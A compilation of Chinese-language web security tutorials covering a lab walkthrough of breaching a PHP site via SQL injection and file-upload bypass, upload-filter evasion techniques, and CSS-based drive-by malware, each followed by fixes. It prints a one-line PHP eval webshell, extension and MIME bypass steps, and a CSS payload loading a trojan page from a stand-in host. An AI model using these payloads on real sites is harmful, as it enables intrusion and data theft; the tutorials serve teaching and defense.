网站攻防学习总结
Web攻防系列教程之 企業網站攻防實戰
摘要:本文通過搭建一個真實的企業網站環境,先以攻擊者的角度對目標網站進行入侵,最終得到目標
網站數據庫中的數據。然后對整個入侵過程進行詳細分析,并修復目標網站存在的安全漏洞和弱點。這
樣通過對一個實例的完整分析,讓讀者對攻擊者入侵網站的過程、以及網站安全加固都有一個直觀的認
識,當遭到黑客入侵時,不再感到無從下手。
隨著B/S架構技術的高速發展和快速應用,現在幾乎所有的企業、政府單位都擁有了自己的網站。對外有
自己的企業門戶網站,對內有OA、ERP、CRM等基于B/S架構的Web應用。與此同時,攻擊者也把目光轉向
了這塊,現在每天都有大量的網站因為存在各種安全漏洞被入侵。輕則網站頁面被篡改,重則機密數據
被竊取,甚至整臺服務器淪陷。一旦遇到這樣的事件,不僅會對企業形象造成非常巨大的負面影響,也
會帶來實際損失,有時這種危害甚至是災難性的。作為一名網站管理人員,非常有必要對這塊給予足夠
的重視。
本文用到的技術和相關工具
技術:SQL注入、文件上傳檢測繞過、后門木馬
工具:Havij(一款SQL注入漏洞掃描和利用工具)、PhpSpy2008后門木馬、中國菜刀一句話木馬
入侵網站的典型步驟
一個技術比較成熟的攻擊者在入侵一個目標網站時,一般會經歷以下三個階段:
 
一、信息收集
這一階段的目的就是通過技術或社會工程學手段去收集目標的各種信息,比如操作系統類型、網站腳本
類型、目標網站采用的數據庫類型等。這個階段收集到的信息越全面、越詳細,對下一階段實施入侵的
幫助越大。一個成熟的攻擊者在實施入侵前會花大量時間去收集目標網站的各種信息,在實施入侵時直
取目標網站的“命門”,決不拖泥帶水,爭取一擊致命。這一點也是一個成熟的攻擊者與剛入門的攻擊
者之間的區別。
二、實施入侵
這一階段中,攻擊者會對信息收集階段得到的信息進行分析、匯總,決定采用哪種方法對目標實施入侵
,然后利用目標存在的安全漏洞和弱點對其實施入侵。在這一階段,攻擊者通常會得到一個權限相對比
較低的Webshell。
三、提權和善后處理
如果在上一階段攻擊者直接得到了一個高權限的Webshell,那么他一般會添加一個后門,方便以后對目
標進行控制,最后還會清除入侵痕跡。但更多情況下,攻擊者會得到一個權限相對較低的Webshell,這
時就需要做提權操作,來獲取到系統的管理員權限。因為篇幅的限制,這里不對提權和清除入侵痕跡做
介紹,在以后的文章中會有詳細的介紹。
入侵網站全過程
通過上面的介紹,相信讀者對攻擊者入侵網站的過程和主要步驟都有了一個簡單的認識。那么,下面我
們就通過一個實例來更深入、直觀的了解這個過程。
目標網站:http://192.168.30.128
入侵目標:得到目標網站數據庫中的數據,并下載回本地。
步驟一 信息收集
首先,我們先來看下目標網站,界面如圖1:
圖1
通過網站頁面,我們發現目標網站是用PHP腳本語言開發的。我們繼續查看其他頁面,當我們點擊“在線
留言“的鏈接時,會出現一個如圖2所示的頁面:
圖2
我們來看下它的URL,http://192.168.30.128/leave_show.php?Id=41,這是一個典型的PHP動態頁面。
看到這個URL是不是很容易想到SQL注入?下面我們就通過手工的方式來探測下該頁面是否存在SQL注入漏
洞吧!
1. 首先,我們先在上面的URL后面添加一個單引號,看返回的頁面是否正常。結果發現返回頁面異常,
提示“不好意思,操作失敗了”。
圖3
2. 接著我們在URL后面添加“+and+1=1”,發現返回的頁面和正常頁面相同。
圖4
3. 最后我們在URL后面添加“+and+1=2”,發現返回的頁面和正常頁面不同。
圖5
OK,通過上面三步我們可以確定此頁面存在SQL注入漏洞。
步驟二 實施入侵
通過上一階段得到的信息,我們確定目標網站存在SQL注入漏洞,下面利用SQL注入漏洞來得到我們感興
趣的內容。
為了方便,此處直接用SQL注入漏洞利用工具來得到目標網站的相關信息。如果讀者對SQL注入漏洞的原
理和詳細手工利用過程感興趣的話,可以查看之前的拙作
http://www.rising.com.cn/newsletter/news/2012-05-24/11580.html,里面有詳細的介紹和相關實例
。
這里我們使用Havij(業界非常著名的一款SQL注入漏洞掃描和利用工具)。首先打開Havij,在“target
”處輸入存在SQL漏洞的URL,其他選項使用默認配置即可,完成后點擊“Analyze”按鈕,軟件開始運行
,如圖6所示:
圖6
很快,Havij就返回了結果,我們得到了目標網站數據庫和其他一些信息,在圖7中我們得到了目標網站
后臺的管理員賬號和密碼。
圖7
密碼是用MD5加密過的,解密后得到的明文是“654321”。
圖8
現在我們得到了目標網站后臺的管理員賬號和明文密碼,只要找到網站的后臺地址,就可以登錄進入網
站后臺了。下面我們來找一下網站的后臺地址吧,還是用Havij來完成,如圖9所示。
圖9
好,現在我們來訪問一下圖9得到的網站后臺地址,后臺界面如圖10。
圖10
輸入前面我們得到管理員賬號和密碼,成功進入網站后臺,如圖11。
圖11
通過瀏覽后臺頁面,我們發現該網站在“友情鏈接”處有一個上面圖片的功能。我們先來嘗試下能否直
接上傳一個PHP的木馬,結果發現上傳失敗,只允許上傳jpg和gif格式的文件。如下圖12。
圖12
上面返回的錯誤信息是我們意料之中的,現在很少有網站可以直接上傳PHP木馬。那么,我們就沒辦法了
嗎?當然不是的,下面我們就來嘗試如何繞過文件上傳檢測。
1.我們來新建一個txt文檔,輸入以下內容:“<?Php @eval($_POST['1']);?>”,這是一個一句話木馬
,然后將這個txt文檔改名為“test.php.jpg”,如圖13。
圖13
2.再次上傳,發現成功了(如圖14)。由此可以判斷,后臺上傳邏輯只是簡單的對文件擴展名做了檢測
,所容易就被我們繞過了。這里之所以能成功是因為在網站中對文件擴展名檢測時,是從后往前檢測的
,當遇到第一個“.”時,便結束檢測。當我們上傳的文件名為類似“test.php.jpg”這種格式時,系統
會認為這是一個合法的JPG文件,從而繞過了文件上傳檢測。
圖14
我們來看下文件上傳后保存的路徑(如圖15)。
圖15
現在我們用一句話木馬客戶端來連接一下剛剛上傳的一句話木馬,先打開“中國菜刀”一句話木馬客戶
端,輸入一句話木馬的地址http://192.168.30.128/link/test.php.jpg和密碼,最后選擇“添加”,如
圖16。
圖16
接著,我們上傳一個PHP的大馬上去。名字為webshell.php,如下圖17。
圖17
現在來訪問下剛剛上傳的PHP大馬,地址為http://192.168.30.128/link/webshell.php,如圖18。
圖18
在PHP中,一般會有一個數據庫連接文件,里面包含網站連接數據庫的賬號和密碼。我們通過查看數據庫
連接文件,得到了Mysql數據庫的賬號和密碼,如圖19。
圖19
OK,現在我們把目標網站的數據庫下載回本地,我們利用PHP大馬來完成這個操作。
1.我們先備份一下目標網站的數據庫,找到“MYSQL Manager”項,輸入Mysql的賬號和密碼,然后選擇
要備份的數據庫,最后點擊“Connect”,提示備份成功,并給出了備份文件保存的路徑和文件名,如圖
20。
圖20
2.跳轉到備份文件保存的目錄下,把備份文件下載回本地,如圖21。
圖21
3.現在把下載的備份文件導入我們本地的數據庫,到此就成功得到了目標網站數據庫中的數據,如圖22
。
圖22
如何保護我們的網站
上面我們通過一個實例來詳細地演示了入侵網站的全過程,但我們的目的并不是為了去入侵別人的網站
,而是為了更好地保護我們自己的網站免遭入侵。我們還是以上面的網站為例,來看下如何修復該網站
存在的安全漏洞和弱點。
在上面的實例中,我們先是利用目標網站的SQL注入漏洞得到了后臺的管理員賬號和密碼,接著通過掃描
發現了網站后臺地址。然后我們登錄進入后臺管理頁面,利用系統文件上傳功能存在的弱點,成功上傳
了一個一句話木馬,得到了目標網站的Webshell,最后將目標網站的數據庫下載回本地,達到了我們最
初定的目標。
那么在分析完整個入侵過程后,我們來看下如何修復這些安全漏洞和弱點吧。
1.修復SQL注入漏洞
先來看下存在SQL注入漏洞處的代碼:
-------------------------------------------------------------------------------------------
$id=$_GET[id]; ? ?//得到從URL傳過來的參數
$rs=mysql_query("select * from leave_table where id=$id") or die("不好意思,操作失敗!");
$array=mysql_fetch_array($rs);
-------------------------------------------------------------------------------------------
從上面的代碼中可以看到,系統在得到URL傳過來的參數后,沒有做任何處理,直接帶入數據庫查詢語句
中執行查詢,這是一個典型的SQL注入漏洞。
下面我們以一個簡單的方法來修復這一漏洞。通過上面的代碼我們得知,“id”是一個整型的參數,所
以我們為了避免SQL注入漏洞的產生,直接將通過GET方式得到“id”參數值轉換為整型,這樣攻擊者構
造的注入代碼便無法執行,從根本上避免了SQL注入。而且只需簡單修改一下代碼就可以實現,非常實用
,具體如下。
-------------------------------------------------------------------------------------------
$id=(int)$_GET[id]; ? ?//修改后的代碼
$rs=mysql_query("select * from leave_table where id=$id") or die("不好意思,操作失敗!");
$array=mysql_fetch_array($rs);
-------------------------------------------------------------------------------------------
現在我們再來看下修改后的代碼是否存在SQL注入漏洞。先在URL后面添加一個單引號,發現現在不能觸
發異常了,返回的依然是正常頁面,如圖23。
圖23
我們再用工具試一下,結果也是一樣,漏洞就這樣簡單地修復了。
2.修復文件上傳檢測存在弱點
我們還是先來看下這部分的代碼:
-------------------------------------------------------------------------------------------
include '../conn.php';
$error=$_FILES['pic']['error'];
$tmpName=$_FILES['pic']['tmp_name'];
$name=$_FILES['pic']['name'];
$size=$_FILES['pic']['size'];
$type=$_FILES['pic']['type'];
if($name <>"")
{
$name1=substr($name,-4); ? ?//得到上傳文件的擴展名
//下面判斷得到上傳文件擴展名是否合法
if(($name1 <> ".gif") and ($name1 <> ".jpg"))
{
echo "<script language=javascript>alert('上傳照片只能是JPG或者GIF!');history.go(-1)
</script>";
exit;
}
if(is_uploaded_file($tmpName)){
$rootpath='../../link/'.$name; ? ? ?//上傳文件保存路徑和文件名
if(!move_uploaded_file($tmpName,$rootpath)){
echo "<script language='JavaScript'>alert('文件移動失
敗!');window.location='add_link.php'</script>";
exit;
}
}
}
global $pic;
$pic=$rootpath;
//
$title = $_POST["title"];
$url = $_POST["url"];
$lx = $_POST["lx"];
$px = $_POST["px"];
$adddate = date('Y-m-d H:i:s'); //echo $addtime = date('Y-m-d H:i:s');
if (mysql_query("insert into link
(link_title,link_url,link_pic,link_lx,link_adddate,link_px)values
('$title','$url','$pic','$lx','$adddate','$px')"))
{
echo "<script>alert('友情鏈接信息添加成功!');location.href='add_link.php';</script>";
}
else{
echo "<script>alert('友情鏈接添加失敗!');history.go(-1)</script>";
}
-------------------------------------------------------------------------------------------
從上面的代碼中我們可以看到,系統只對上傳文件的護展名做了簡單的檢測,下面我們來修復這段代碼
存在的漏洞。
我們可以對上傳后的文件改名,一般采用的方式是基于當前系統時間去生成新的文件名,在這里只需要
修改一句代碼即可完成。修改后的代碼如下:
$rootpath='../../link/'.time().$name1;
這樣一來,再上傳類似test.php.jpg這樣格式的文件時,因為文件名會被修改成類似1346834131.jpg這
種格式,所以會造成無法解析。
上面是從代碼層來解決問題,還可以在服務器上做相應配置,來阻止這樣的漏洞被成功利用。我們只需
要把保存上傳文件目錄的“執行”權限去掉即可完全阻止這樣的漏洞被成功利用。而且該目錄根本沒必
要分配執行腳本的權限。在分配目錄權限時有一個原則——“目錄有寫入權限,一定不要分配執行權限;
目錄有執行權限,一定不要分配寫入權限。
做到了這一點,即使攻擊者成功上傳了后門木馬,也會因為沒有執行權限而無法解析,去掉保存上傳文
件目錄的“執行”權限的方式如圖24所示。
圖24
修改權限后,我們上傳的后門木馬因為權限不足而無法正常解析,如圖25。
圖25
3.其他方面安全加固
設置一個復雜的管理員賬號和密碼,并修改默認的網站管理后臺地址。在PHP中,建議用一個低權限賬號
來連接數據庫,一定不要用root權限連接,這是非常危險的。如果一臺服務器有多個網站,建議為每個
網站分配單獨的數據庫連接賬號,并設置一個復雜的密碼。
========
Web攻防系列教程之 文件上傳攻防解析
文件上傳是WEB應用很常見的一種功能,本身是一項正常的業務需求,不存在什么問題。但如果在上傳時
沒有對文件進行正確處理,則很可能會發生安全問題。本文將對文件上傳的檢測方式以及如何繞過相應
檢測方式進行詳細的分析,并提供針了對文件上傳攻擊的安全防護方法。
文件上傳攻擊是指攻擊者利用WEB應用對上傳文件過濾不嚴,導致可以上傳應用程序定義類型范圍之外的
文件到Web服務器。比如可以上傳一個網頁木馬,如果存放上傳文件的目錄剛好有執行腳本的權限,那么
攻擊者就可以直接得到一個WebShell。
文件上傳攻擊的原理
由于服務器端沒有對用戶上傳的文件進行正確的處理,導致攻擊者可以向某個可通過 Web 訪問的目錄上
傳惡意文件,并且該文件可以被Web服務器解析執行。
攻擊者要想成功實施文件上傳攻擊,必須要滿足以下三個條件:
1.可以上傳任意腳本文件,且上傳的文件能夠被Web服務器解析執行,具體來說就是存放上傳文件的目錄
要有執行腳本的權限。
2.用戶能夠通過Web訪問這個文件。如果文件上傳后,不能通過Web訪問,那么也不能成功實施攻擊。
3.要知道文件上傳到服務器后的存放路徑和文件名稱,因為許多Web應用都會修改上傳文件的文件名稱,
那么這時就需要結合其他漏洞去獲取到這些信息。如果不知道上傳文件的存放路徑和文件名稱,即使你
上傳了也無法訪問。
主流文件上傳檢測方式概述
主流的文件上傳檢測方式有以下五種:
1.客戶端javascript檢測
客戶端檢測通常在上傳頁面里含有專門檢測文件上傳的javascript代碼,在文件被上傳之前進行檢測,
最常見的就是檢測上傳文件的文件類型和大小是否合法。
2.服務端MIME類型檢測
這類檢測方法通過檢查http包的Content-Type字段中的值來判斷上傳文件是否合法。
3.服務端文件擴展名檢測
這類檢測方法通過在服務端檢測上傳文件的擴展名來判斷文件是否合法。
4.服務端目錄路徑檢測
這類檢測一般通過檢測路徑是否合法來判斷。
5.服務端文件內容檢測
這 類檢測方法相當對上面四種檢測方法來說是最為嚴格的一種。它通過檢測文件內容來判斷上傳文件是
否合法。這里,對文件內容的檢測主要有兩種方法。A.通過檢 測上傳文件的文件頭來判斷。通常情況下
,通過判斷前10個字節,基本就能判斷出一個文件的真實類型。B.文件加載檢測,一般是調用API或函數
對文件進行 加載測試。常見的是圖像渲染測試,再嚴格點的甚至是進行二次渲染。
如何繞過文件上傳檢測
上面我們分析了主流的文件上傳檢測方式,下面我們就來看下如何繞過上面提到的文件上傳檢測方式,
本文只討論如何繞過前三種檢測方式。
1.繞過客戶端javascript檢測
這 種檢測方法是最不安全的,也是最容易被攻擊者繞過的。Web應用不應只采用這一種手段檢測上傳文
件,但可以作為一種輔助手段。因為采用客戶端 javascript檢測可以增強應用對用戶的友好度。由于
javascript檢測是在客戶端實現的,所以我們完全能夠控制它。可以在瀏覽器端禁用js 腳本,比如在
FireFox上安裝FireBug這一插件就可以實現這一功能。另外一種是通過代理工具來實現,下面介紹利用
Burp Suite來繞過客戶端javascript檢測。Burp Suite不僅僅只是一個代理工具,更是一款強大的網絡
滲透利器。關于Burp Suite的詳細資料請自行百度。
這個站點http://www.target.com(注:由于該網站為真實站點,為了目標網站的安全,所以用target來
代替真實域名)的文件上傳功能只采用了客戶端javascript檢測,所以很容易被繞過。下面我們來具體
看下操作方法。
首先,我們看一下正常情況下上傳一個.asp文件,應用會有什么反應。
a. 我們訪問這個URL(http://www.target.com/AdvHTML_Popups/upload.asp),會出現一個上傳文件的
頁面
b. 我們先選擇一個.asp文件,這時會提示不允許上傳這種類型的文件。注意,這時我們還沒有點擊“件
,這時會提示按鈕,就出現提示信息。我們可以判斷出這個網站是在客戶端判斷上傳文件類型的合法性
的。如圖1:
圖1
上面的情況證明在正常情況下是不能成功上傳.asp文件的,那么下面就來看下如何繞過這種檢測吧。
c. 我們先打開Burp Suite代理工具,然后配置瀏覽器使用代理。如圖2:
圖2
d. 我 們先把剛才的那個.asp文件擴展名改為.gif,然后點擊“然后點擊“為那按鈕。這時Burp Suite
中就會攔截到瀏覽器提交的HTTP數據包。我們把filename字段的值webshell.gif修改為webshell.asp,
再點擊 “再點擊“ell”按鈕,會發現文件成功上傳到服務器。如圖3:
圖3
2.繞過服務端MIME類型檢測
服 務端MIME類型檢測是通過檢查http包的Content-Type字段中的值來判斷上傳文件是否合法的。我們來
訪問 http://193.168.20.235/upload.html,這是一個上傳頁面,當你選擇上傳文件,點擊“上傳”按
鈕后,會跳轉到 uploadf.php中進行處理。先來看下uploadf.php的代碼,如圖4:
圖4
那么我們如何繞過這種檢測方式呢?下面來看具體操作,還是用Burp Suite來完成。
我 準備上傳webshell.php到服務器,這是個一句話木馬。選擇好文件,然后點擊“上傳”,這時Burp?
Suite攔截到發往服務器的HTTP請求,我們在Burp Suite修改HTTP數據包中的內容,然后點擊“據包中的
內容,然按鈕把數據包再轉發給服務器。如圖5:
圖5
這時會提示文件成功上傳,還會顯示文件保存路徑,說明我們成功繞過了服務端的MIME文件類型檢測,
如圖6。
圖6
現在我們用中國菜刀連接一下,可以成功訪問到,效果如圖7:
圖7
3.繞過服務端文件擴展名檢測
現在我們來看下如何繞過服務端文件擴展名檢測,先來看下這兩段代碼,如圖8:
圖8
上面的代碼是一個上傳表單,在選擇上傳文件,點擊“上傳”按鈕后會跳轉到uploadfiles.asp中進行處
理。我們來看下uploadfiles.asp文件中檢測上傳文件擴展名的代碼,如圖9:
圖9
上面代碼的意思是先得到上傳文件的擴展名,然后和允許上傳的文件類型對比,如果不符合定義,則提
示“上傳的文件格式不對!”。
下面具體看下如何繞過這種檢測方式,我們先直接上傳一個.asp的木馬,會提示上傳文件格式不對,這
和我們預期的結果一致,如圖10:
圖10
現在我們將webshell.asp改為webshell.asp;test.jpg,再次上傳,會發現我們的webshell被成功上傳到
服務器上,如圖11。
圖11
現在我們來訪問下,地址為http://192.168.1.105/bookpic/webshell.asp;test.jpg,可以正常訪問,
如圖12。
圖12
注:這里利用了IIS的解析漏洞,當文件名為1.asp;1.jpg時,IIS會將此文件解析為1.asp,文件名被截
斷,導致腳本被執行。而且存放上傳文件的目錄要有執行腳本的權限,否則不能執行成功。
設計安全的文件上傳功能
上面我們介紹了主流的文件上傳檢測以及繞過檢測的方式,那么如何設計出一個安全的文件上傳功能呢
?下面我們就來總結一下。
1.設置保存上傳文件的目錄為不可執行
只要Web服務器無法解析該目錄下的文件,即使攻擊者上傳了腳本文件,服務器本身也不會受到影響,此
點至關重要。
2.判斷文件類型
在判斷文件類型時,可以結合使用MIME Type、后綴檢查等方式。在文件類型檢查中,強烈建議采用白名
單的方式。此外,對于圖片的處理可以使用壓縮函數或者resize函數,在處理圖片的同時破壞圖片中可
能包含的惡意代碼。
3.使用隨機數改寫文件名和文件路徑
文件上傳如果要執行代碼,則需要用戶能夠訪問到這個文件。在某些環境中,用戶能上傳,但不能訪問
。如果采用隨機數改寫了文件名和路徑,將極大地增加攻擊成本。與此同時,像webshell.asp;1.jpg這
種文件,將因為文件名被改寫而無法成功實施攻擊。
========
網站制作CSS掛馬攻防實錄
在Web1.0時代,使用E掛馬對于黑客而言,與其說是為了更好地實現木馬的躲藏,倒不如說是無可奈
何的一個選擇。在簡樸的HTML網頁和缺乏交互性的網站中,黑客可以利用的手段也非常有限,即使采取
了復雜的偽裝,也很輕易被識破,還不如E來得直接和有效。但如今交互式的Web2.0網站越來越多,答應
用戶設置與修改的博客、SNS社區等紛紛泛起。這些互動性非常強的社區和博客中,往往會提供豐碩的功
能,并且會答應用戶使用CSS層疊樣式表來對網站制作進行自由的修改,這促使了CSS掛馬流行。
攻CSS掛馬方式較多,但主流的方式是通過有漏洞的博客或者SNS社交網站系統,將惡意的CSS代碼寫
入支持CSS功能的個性化頁面中。下面我們以典型的CSS掛馬方式為例進行講解。
方式1:
Body
“background-image”在CSS中的主要功能是用來定義頁面的背景圖片。這是最典型的CSS掛馬方式
,這段惡意代碼主要是通過“background-image”配合t代碼讓網頁木馬靜靜地在用戶的電腦中運行。
那如何將這段CSS惡意代碼掛到正常的網頁中去呢?黑客可以將天生好的網頁木馬放到自己指定的位
置,然后將該段惡意代碼寫入掛馬網站的網頁中,或者掛馬網頁所調用的CSS文件中。
方式2:
Body
background-image: url(t:open(“http://www.X.com/muma.htm”,”newwindow”,”border=
”1″ Height=0, Width=0, top=1000, center=0, toolbar=no,menubar=no, scrollbars=no,
resizable=no,location=no,status=no”))
方式1的CSS掛馬技術,在運行時會泛起空缺的頁面,影響網頁訪問者正常的訪問,因此比較輕易發
現。不外在方式2中的這段代碼,使用了t的Open開窗,通過新開一個躲藏的窗口,在后臺靜靜地運行新
窗口并激活訪問網頁溢出木馬頁面,不會影響訪問者觀看網頁內容,因此更加隱蔽。
防網絡服務器被掛馬,通常會泛起防病毒軟件告警之類的信息。因為漏洞不斷更新,掛馬種類時刻
都在變換,通過客戶真個反映來發現服務器是否被掛馬往往疏漏較大。準確的做法是常常檢查服務器日
志,發現異常信息,常常檢查網站代碼,使用網頁木馬檢測系統,進行排查。
目前除了使用以前的阻斷彈出窗口防范CSS掛馬之外,還可以在網頁中設置CSS過濾,將CSS過濾掉。
不外假如你選擇過濾CSS的話,首先需要注意自己的相關網頁是否有CSS的內容,因此我們仍舊首推用阻
斷方式來防范CSS。阻斷代碼如下所示:
emiao1:expression(this.src=”about:blank”,this.outerHTML=”");
將外域的木馬代碼的src重寫本錢地IE404錯誤頁面的地址,這樣,外域的t代碼不會被下載。
========
總結
 
                            
                        - 上一篇: FTP协议学习总结
- 下一篇: 使用aardio(快手)编程
